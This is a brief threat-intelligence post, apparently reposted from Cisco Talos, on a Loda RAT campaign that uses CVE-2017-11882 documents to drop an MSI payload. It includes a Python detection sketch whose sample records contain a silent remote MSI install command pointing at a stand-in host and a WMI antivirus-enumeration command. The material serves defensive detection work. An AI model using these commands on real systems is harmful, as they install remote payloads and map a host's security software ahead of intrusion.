
Loda RAT Grows Up

By Chris Neal.

Over the past several months, Cisco Talos has observed a malware campaign that utilizes websites hosting a new version of Loda, a remote access trojan (RAT) written in AutoIT.
These websites also host malicious documents that begin a multi-stage infection chain which ultimately serves a malicious MSI file. The second stage document exploits CVE-2017-11882 to download and run the MSI file, which contains Loda version 1.1.1.
This campaign appears to be targeting countries in South America and Central America, as well as the U.S.

What’s New?

Talos has observed several changes in this version of Loda. The obfuscation technique used within the AutoIT script changed to a different form of string encoding. Multiple persistence mechanisms have been employed to ensure Loda continues running on the infected host following reboots. Lastly, the new version leverages WMI to enumerate antivirus solutions running on the infected host.
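As an added detection sketch (written for this page, not code from the Talos post), the following Python scores constructed process-creation records for the chain described in the introduction and the WMI antivirus enumeration noted above: CVE-2017-11882 is a flaw in the Equation Editor component (EQNEDT32.EXE), so the MSI stage surfaces as that process, or an Office application, spawning msiexec; the AV enumeration surfaces as a WMI query for AntiVirusProduct. The field names, paths and log records are assumptions constructed for illustration.

```python
"""Flag the Loda infection-chain behaviours on Sysmon-style process records.

Assumed record fields: pid, parent, image, cmdline (constructed, not real
telemetry). CVE-2017-11882 is exploited through Equation Editor, so the
downloaded MSI shows up as EQNEDT32.EXE (or an Office app) launching
msiexec.exe; the AutoIT payload's antivirus discovery shows up as a WMI
query against the AntiVirusProduct class.
"""
import re
from typing import Dict, Iterable, List

OFFICE_PARENTS = {"eqnedt32.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
INTERPRETERS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe"}


def classify(rec: Dict[str, str]) -> List[str]:
    """Return the suspicious behaviours a single record exhibits (empty if clean)."""
    parent = rec.get("parent", "").lower().rsplit("\\", 1)[-1]
    image = rec.get("image", "").lower().rsplit("\\", 1)[-1]
    cmd = rec.get("cmdline", "")
    hits: List[str] = []
    if parent in OFFICE_PARENTS and image == "msiexec.exe":
        hits.append("office-spawned-msiexec")       # exploit stage handing off to MSI
    if image == "msiexec.exe" and re.search(r"https?://\S+\.msi", cmd, re.I):
        hits.append("remote-msi-install")           # MSI fetched straight from a URL
    if parent in OFFICE_PARENTS and image in INTERPRETERS:
        hits.append("office-spawned-interpreter")   # common alternative second stage
    if re.search(r"AntiVirusProduct", cmd, re.I) or "securitycenter2" in cmd.lower():
        hits.append("wmi-av-enumeration")           # AV discovery via WMI
    return hits


def scan(records: Iterable[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map 'image:pid' of every flagged record to its behaviours."""
    result: Dict[str, List[str]] = {}
    for rec in records:
        hits = classify(rec)
        if hits:
            result[f"{rec['image']}:{rec['pid']}"] = hits
    return result


# Constructed sample records (assumed paths; not captured from a real host).
SAMPLE = [
    {"pid": "100", "parent": r"C:\Office\WINWORD.EXE", "image": r"C:\Office\EQNEDT32.EXE",
     "cmdline": "EQNEDT32.EXE -Embedding"},
    {"pid": "101", "parent": r"C:\Office\EQNEDT32.EXE", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /q /i http://example.invalid/update.msi"},
    {"pid": "102", "parent": r"C:\Windows\System32\msiexec.exe", "image": r"C:\Temp\AutoIt3.exe",
     "cmdline": "AutoIt3.exe loader.a3x"},
    {"pid": "103", "parent": r"C:\Temp\AutoIt3.exe", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName"},
    {"pid": "104", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\installers\app.msi"},
]
```

Running `scan(SAMPLE)` flags only pids 101 and 103; the benign local MSI install (pid 104) and the Equation Editor launch itself (pid 100) produce no hits.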


The post Loda RAT Grows Up appeared first on Cisco Blogs.